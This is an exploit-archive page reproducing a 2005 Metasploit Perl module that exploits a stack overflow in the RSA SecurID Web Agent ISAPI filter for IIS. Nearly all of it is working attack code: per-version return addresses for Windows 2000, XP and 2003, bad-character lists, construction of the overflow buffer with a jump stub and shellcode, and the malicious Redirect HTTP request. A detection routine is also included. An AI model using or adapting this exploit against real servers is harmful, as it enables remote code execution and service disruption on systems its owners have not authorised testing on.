MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows IIS SA WebAgent 5.2/5.3 Redirect Overflow Exploit (meta)
# Published : 2005-10-19
# Author : H D Moore
# Previous Title : Veritas NetBackup <= 6.0 (bpjava-msvc) Remote Exploit (linux)
# Next Title : MS Windows Color Management Module Overflow Exploit (MS05-036) (2)
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rsa_iiswebagent_redirect;
use base "Msf::Exploit";
use strict;
use Pex::Text;

my $advanced = { };

my $info =
  {
	'Name'  => 'IIS RSA WebAgent Redirect Overflow',
	'Version'  => '$Revision: 1.4 $',
	'Authors' => [ 'H D Moore <hdm [at] metasploit.com>', ],
	'Arch'  => [ 'x86' ],
	'OS'    => [ 'win32' ],
	'Priv'  => 0,
	'UserOpts'  =>
	  {
		'RHOST' => [1, 'ADDR', 'The target address'],
		'RPORT' => [1, 'PORT', 'The target port', 80],
		'SSL'   => [0, 'BOOL', 'Use SSL'],
		'URL'   => [1, 'DATA', 'The path to the DLL', '/WebID/IISWebAgentIF.dll'],
	  },

	'Payload' =>
	  {
		'Space'     => 1024,
		'BadChars'  => 
						"x00x09x0ax0bx0dx20x22x23x25x26x27x2bx2f".
						"x3ax3bx3cx3dx3ex3fx40x5c". "Z",
						
		'Prepend'   => "x81xc4x54xf2xffxff",
		'Keys'      => ['+ws2ord'],
	  },

	'Description'  => Pex::Text::Freeform(qq{
		This module exploits a stack overflow in the SecurID Web Agent for IIS.
	This ISAPI filter runs in-process with inetinfo.exe, any attempt to
	exploit this flaw will result in the termination and potential restart
	of the IIS service.
}),

	'Refs'  =>
	  [
	  	# Anyone got a patch/advisory/solution URL?
	  ],
	  
	'Targets' =>
	  [
	  	# Version-specific return addresses
		['RSA WebAgent 5.2', 996, 0x1001e694],
		['RSA WebAgent 5.3', 992, 0x10010e89],
		
		# Generic return addresses
		['RSA WebAgent 5.2 on Windows 2000 English', 996, 0x75022ac4],
		['RSA WebAgent 5.3 on Windows 2000 English', 992, 0x75022ac4],
		
		['RSA WebAgent 5.2 on Windows XP SP0-SP1 English', 996, 0x71ab1d54],
		['RSA WebAgent 5.3 on Windows XP SP0-SP1 English', 992, 0x71ab1d54],
		
		['RSA WebAgent 5.2 on Windows XP SP2 English', 996, 0x71ab9372],
		['RSA WebAgent 5.3 on Windows XP SP2 English', 992, 0x71ab9372],
		
		['RSA WebAgent 5.2 on Windows 2003 English SP0', 996, 0x7ffc0638],
		['RSA WebAgent 5.3 on Windows 2003 English SP0', 992, 0x7ffc0638],

	  ],

	'Keys' => ['rsa'],
  };

sub new {
	my $class = shift;
	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
	return($self);
}

sub Check {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return $self->CheckCode('Connect');
	}

	$s->Send("GET ".$self->GetVar('URL')."?GetPic?image=msf HTTP/1.1rnHost: $target_host:$target_portrnrn");

	my $r = $s->Recv(-1, 5);

	if ($r =~ /RSA Web Access Authentication/)
	{
		$self->PrintLine("[*] Found IISWebAgentIF.dll ;)");
		return $self->CheckCode('Detected');
	} else {

		$self->PrintLine("The IISWebAgentIF.dll ISAPI does not appear to be installed");
		return $self->CheckCode('Safe');
	}
}

sub Exploit {
	my $self = shift;
	my $target_host = $self->GetVar('RHOST');
	my $target_port = $self->GetVar('RPORT');
	my $target_idx  = $self->GetVar('TARGET');
	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
	my $target      = $self->Targets->[ $target_idx ];

	$self->PrintLine("[*] Attempting to exploit target ".$target->[0]);


	my $pattern = Pex::Text::AlphaNumText(8192);
	# Just don't ask.
	$pattern =~ s/d|Z/A/ig;
	
	substr($pattern, $target->[1]    , 4, pack('V', $target->[2]));
	substr($pattern, $target->[1] - 4, 2, "xebx06");
	substr($pattern, $target->[1] + 4, length($shellcode), $shellcode);

	my $request =
	  "GET ".$self->GetVar('URL')."?Redirect?url=$pattern HTTP/1.1rn".
	  "Host: $target_host:$target_portrnrn";

	my $s = Msf::Socket::Tcp->new
	  (
		'PeerAddr'  => $target_host,
		'PeerPort'  => $target_port,
		'LocalPort' => $self->GetVar('CPORT'),
		'SSL'       => $self->GetVar('SSL'),
	  );
	if ($s->IsError) {
		$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
		return;
	}

	$self->PrintLine("[*] Sending " .length($request) . " bytes to remote host.");
	$s->Send($request);

	$self->PrintLine("[*] Waiting for a response...");
	$s->Recv(-1, 10);
	$self->Handler($s);
	$s->Close();
	return;
}

# www.Syue.com [2005-10-19]